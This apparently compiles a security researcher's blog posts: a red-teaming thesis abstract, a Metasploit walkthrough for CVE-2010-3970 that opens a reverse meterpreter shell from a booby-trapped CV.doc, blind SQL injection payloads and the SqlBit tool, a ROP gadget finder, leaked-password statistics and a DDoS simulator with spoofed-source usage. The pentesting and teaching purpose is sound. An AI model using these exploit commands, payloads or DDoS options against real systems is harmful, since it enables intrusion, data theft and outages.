Because several people asked me to publish my work, here it is.

Title: Proactive Cyber Security by Red Teaming

Acknowledgements:

It is a pleasure for me to thank all the people who made this Thesis possible.

I am deeply grateful to my supervisor, prof. dr. ing. Victor-Valeriu Patriciu for his valuable advice and for his great ideas that he shared with me during the doctoral program. His academic experience and his close supervision made me feel this work easier than it really was.

I also want to thank prof. dr. ing. Ion Bica, Head of “Computers and Military Information Systems” Department from the Military Technical Academy of Bucharest for his precious guidelines and critical review of this Thesis.
Many thanks also to my colleagues and friends from KPMG Romania, IT Advisory Department and from Romtelecom, IT Security Department for their informal support and encouragement in realization of this work.

This Thesis would not have been possible without the precious help of my wife, Silvia, whose love and understanding encouraged me to continue my research and finish the work in time, so I sincerely thank her. I would also like to thank my parents for their support and for the education they gave me.

Abstract:

Our society is dependent on computers and software, which makes it increasingly vulnerable to cybernetic attacks. These attacks affect us at national, organizational and personal levels and are caused by an ineffective approach towards security. Classic security measures – which are reactive and defensive – are no longer enough against today’s cybernetic threats. There is a high need for proactive security measures to effectively protect the information systems.

The goal of this Thesis is to bring a set of improvements to the Red Teaming assessment process for information systems. Red Teaming is an advanced form of evaluation which implements the proactive approach towards security. It simulates advanced cyber threats, finds vulnerabilities in the target systems and reports them to systems’ owner, providing a reliable basis for decision making within an organization.

In the Thesis we create a comprehensive view of the Red Teaming process, including the perspective of the client and the prespective of the provider. We analyze and implement different attack techniques that can be used during Red Teaming assessments and explore the methods of finding new vulnerabilities in software products with a greater emphasis on the fuzzing technique. Further on, we analyze and implement a set of techniques for vulnerability exploitation on modern operating systems, including the bypass methods for Windows protection mechanisms (Stack Cookies, SafeSEH, DEP and ASLR). In the end we address the problem of creating cyber defense exercises as a method for training Red Team members and system’s defenders and we propose a standard template for creating this type of exercises.

Contents:

List of Tables
List of Figures
Abstract
1. Introduction
2. Current state of cyber security
3. Red Teaming Usage in Securing Information Systems
4. Cyber attack techniques
5. Discovery of software vulnerabilities
6. Exploitation of software vulnerabilities
7. Training the Red Teams using cyber defense exercises
8. Summary, Conclusions and Future work
Bibliography
Appendices

I hope you will find it a pleasant reading.

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit


Et voila! The shell we were waiting for…

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.

Considerations about Red Teaming Usage in Assessing Information Assurance is an article that I have recently written and presented to SECITC 2010 security conferece. Please find below the abstract and table of contents which should increase your interest for reading it.

Abstract: Red Teaming is an advanced form of assessment that models and simulates adversary actions with the overall purpose of discovering target’s weaknesses and improving its defenses. Also known as ethical hacking, penetration testing or security assessment, Red Teaming of information systems offers reliable information about the effectiveness of defense mechanisms implemented. The paper presents the Red Teaming process from both perspectives: the client and the assessor, covering various aspects like: motivation, assessment types, client benefits, client risks, assessment planning, team organization, attack preparation, execution and reporting.

Contents:

1. Introduction
2. What is Red Teaming?
3. Red Teaming assessment from the client’s perspective
   • Why should an organization use a Red Teaming assessment?
   • When is the best time to use a Red Teaming assessment?
   • What are the benefits for the client?
   • What are the risks for the client?
   • What type of assessment should be chosen?
   • Who can be the target?
4. Red Teaming assessment from the provider’s perspective
   • Define assessment objectives
   • Assemble the Red Team
   • Reverse engineer the target
   • Create and validate attack trees
   • Assign Red Team members to attacks
   • Prepare tools and methods
   • Perform collaborative attacks
   • Create the report
   • Explain report to client
5. Conclusions

For documentation and use cases please see this post.

If you have any questions, don’t hesitate to ask!

This is especially useful in the exploit development process when existing gadget finding tools do not produce the results you need and you must extend your search manually. 

When using the return-oriented-programming (ROP) technique for exploit development, you usually need to find useful instructions followed by RET. There are some tools to search for these gadgets (ex. pvefindaddr) but what if they do not find the gadgets you need? The search must be extended and bdasm is the tool you need. 

Use case scenarios: 

Example 1: Search for all occurences of instruction xchg eax,esp in the address space of module kernel32.dll and display the instructions before and after. Display results only if the page is executable (-e) and if the instructions after contain a RET (-r). The space character from an instruction must be replaced by _ : 

!bdasm -i xchg_eax,esp -m kernel32.dll -e -r 

Disassemble at instruction

Notes:

• As you can see in the screenshots, backward disassembling can produce multiple results from the same starting address because x86 instructions have variable lengths
• Backward disassembling does not always produce results when it is started from an arbitrary address because the previous bytes of that address do not always form a valid instruction
• bdasm tries to go backwards as many instructions as it can find, implementing a kind of backtracking algorithm

Example 2: Search for all occurences of add esp, xxx in module kernel32.dll. To do this, we assemble the instruction add esp, 50 and we obtain the opcode 81c450. So we will search for all occurences of the byte sequence 81c4 in module msvcrt.dll:

!bdasm -o 83c4 -m msvcrt.dll -e -r

Disassemble at opcode / byte sequence

Example 3: Disassemble (backward and forward) from a specific address. Print maximum 4 instructions backward and 6 instructions forward:

!bdasm -a 71ad26b1 -b 4 -f 6

Disassemble at address

Installation and usage:

Copy bdasm.py into the PyCommands directory of your Immunity Debugger installation (my path is C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)

For usage instructions type: !bdasm in the Command Bar of Immunity Debugger.

Hoping that this tool will be useful to you, do not hesitate to send me any feedback!

Cheers,

 Abstract: – Cyber security exercises are a very effective way of learning the practical aspects of information security. But designing such exercises is not an easy task and requires the work of several people. This paper presents a number of steps and guidelines that should be followed when designing a new cyber security exercise. The steps include: defining the objectives, choosing an approach, designing network topology, creating a scenario, establishing a set of rules, choosing appropriate metrics and learning lessons. The intended audience of this paper is persons who are in charge with design and organization of a new cyber security exercise and do not have the experience of previous exercises.

Key-Words: – cyber security exercise, cyber defense exercise, security education, design guide

If any questions, feel free to contact me.

This function is very useful in blind SQL injection attacks where you often need to extract multiple rows from a table in a single query. Then you will probably obtain this data through an out-of-band channel.

Unfortunately, Oracle does not have such a function. So what do you do if you need to extract multiple rows in a single query?

After a few hours of searching I have found a solution that works:

Assuming you have a table called mytable which has a column called mycolumn, you can obtain a concatenation of all the values from mycolumn by using this query:

SELECT LTRIM(MAX(SYS_CONNECT_BY_PATH(mycolumn,',')) KEEP (DENSE_RANK LAST ORDER BY curr),',') AS xyz FROM (SELECT mycolumn, rownum AS curr, rownum -1 AS prev FROM mytable WHERE mycolumn <= 'C02BC00555') CONNECT BY prev = PRIOR curr START WITH curr = 1

This worked for me in Oracle 10g but I'm pretty sure it works for other versions too.

Cheers,

Anyone interested can search himself in the username list to see if his account has been exposed. The passwords do not match because I have intentionally shuffled them. My purpose was not to expose peoples passwords but to make a statistic analisys on the 24k list, similar to this analysis made on the first 10k list of accounts posted on pastebin.com.

So, the list that I found had initially 24,546 entries. Not all of them were in the username@domain/password format so, after a bit of cleaning, I got a 23,573 list of useful accounts. Then I removed the duplicates and I got the final list of 21686 entries. On this list I have made my analysis.

I should mention that there are not only Hotmail accounts in the list but also Yahoo, Gmail, AoL and other accounts. Here is the top 20 domains and the number of accounts for each of them:

And the pie version if you like:

If we look at the usernames, we can see that the first 9,586 of them are alphabetically ordered and they are the ones from the first list posted on pastebin.com. They begin with letters ‘A’ and ‘B’. As Mr. Bogdan Calin said, based on their passwords, they seam to belong to the Latino community. But the rest of the accounts seam to be from worldwide.

The most used password is still 123456 . As you can see below, from the total of 21,686 passwords, 91 of them were 123456 . Here is the top 100 of the most commonly used passwords from the list:

About the passwords format, I could extract the following statistics:

• 43.3%   alphanum, lower case. Example: monkey
• 2.1%     alphanum, lower and upper. Example: Thomas
• 15.8%   numeric only passwords. Example: 123456
• 35.1%   alphanum and numbers. Example: j0s3ph
• 3.6%     alphanum, numbers and special chars. Example: sandra19_1961
• 30%      numeric ended passwords. Example: hello1

If we look at the password lengths in the following graph, we can see that most of them are 6 characters long:

In conclusion, now it’s a good time to do  our regular password change routine. Choose a long and complex password and beware of phishing attempts!

Cheers,

You can run SqlBit like this:

perl    sqlbit.pl    “arbitrary SQL query”

Example:

perl    sqlbit.pl    “SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ “

This application was written in Perl so it can run anywhere you have a Perl interpreter (Windows, Linux, etc). It is fully customizable by using a configuration file config.txt where you can set many parameters from the HTTP request. The configuration file looks like this:

HTTP_Method=POST
URL=http://www.vulnerabile-site.com/login.php
HTTP_VERSION=HTTP/1.1
Host=www.vulnerabile-site.com
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Paros/3.2.13
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-us
Accept-Charset=ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Referer=http://www.vulnerabile-site.com/index.php
Cookie=PHPSESSID=776a2e7181af170e7d57f51773b9527b
Content-Type=application/x-www-form-urlencoded
Content-Length=21
param: user=j’ and ($SQL$) — ‘
param: password=xxx

You can see that SqlBit requires a place where it can put a valid SQL query. You should previously test that this query gets executed successfully. This place must be specified by the string $SQL$.

That’s all about the functionality of SqlBit. If you want to know more, here is some background information:

During some of my pentests I encountered blind SQL injection vulnerabilities. I tried to use a few tools that were supposed to exploit them but none of them reached my expectations. So I decided to write my own tool and here it is.

As you may already know, blind SQL injection is when you can’t see the result of a query but it gets executed successfully on the server side. For instace:

httx://www.vulnerable-site.com/view.jsp?page=13′ limit 0 union select 1,2,3 from dual where 1 — ‘

This can be specified in SqlBit configuration file as:

param: page=13′ limit 0 union select 1,2,3 from dual where $SQL$ — ‘

If the URL above produces the same output as the legitimate URL:

httx://www.vulnerable-site.com/view.jsp?page=13

it might be because the parameter page is not filtered correctly and we can inject SQL commands. But we cannot always see the output of our SQL commands because of the application internal logic or other reasons.

In this case we can use a timing attack that is based on this MySQL query:

SELECT IF (expresion, true, false)

where expression is a query that returns true or false. In the true case we can sleep (BENCHMARK) a certain amount of time while in the false case we return directly. This way we are able to know if a bit of data is 0 or 1.

By automating the requests, we can extract data from the database bit by bit.

Enjoy!

ddosim is a tool that can be used in a laboratory environment to simulate a distributed denial of service (DDOS) attack against a target server. The test will show the capacity of the server to handle application specific DDOS attacks. ddosim simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, ddosim starts the conversation with the listening application (e.g. HTTP server).

ddosim is written in C++ and runs on Linux. Its current functionalities include:

• HTTP DDoS with valid requests
• HTTP DDoS with invalid requests (similar to a DC++ attack)
• SMTP DDoS
• TCP connection flood on random port

In order to simulate such an attack in a lab environment we need to setup a network like this:

Network configuration for DDOS simulation

On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side.

There are a lot of options that make the tool  quite flexible:

Usage: ./ddosim
-d IP                   Target IP address
-p PORT            Target port
[-k NET]             Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]      Output interface name
[-c COUNT]       Number of connections to establish
[-w DELAY]       Delay (in milliseconds) between SYN packets
[-r TYPE]             Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
[-n]                       Do not spoof source address (use local address)
[-v]                       Verbose mode (slower)
[-h]                       Print this help message

Examples:

1. Establish 10 TCP connections from random IP addresses to www server and send invalid HTTP requests (similar to a DC++ based attack):

./ddosim   -d 192.168.1.2   -p 80   -c 10   -r HTTP_INVALID  -i eth0

2. Establish infinite connections from source network 10.4.4.0 to SMTP server and send EHLO requests:

./ddosim   -d 192.168.1.2   -p 25   -k 10.4.4.0   -c 0   -r SMTP_EHLO  -i eth0

3. Establish infinite connections at higher speed to www server and make HTTP valid requests:

./ddosim   -d 192.168.1.2   -p 80   -c 0   -w 0   -t 10   -r HTTP_VALID  -i eth0

4. Establish infinite TCP connections (without sending a Layer 7 request)  from local address to a POP3 server:

./ddosim   -d 192.168.1.2   -p 110   -c 0  -i eth0

More background info:

Some of the hardest to mitigate distributed denial of service attacks are the ones targeting the application layer (in TCP/IP stack). They are difficult to stop because they look legitimate to classic firewalls which let them pass freely (for an example look here). The only way to stop this kind of attacks is deep packet inspection (layer 7 inspection) which means a lot of money/resources.

In general, a DDoS attack is performed by an armie of bots (zombies) that simultaneously send attack packets to a victim server. If we talk about UDP packets (ex. targeting a DNS server), the attack is easier to implement because a zombie needs to send a single UDP packet (multiple times) to contribute to the attack. But in case of a TCP based attack, the zombie needs first to establish the full TCP 3-way handshake and then send the data packets (e.g. HTTP GET request). ddosim successfully simulates this attack scenario.

If you have any questions regarding ddosim, please let me know.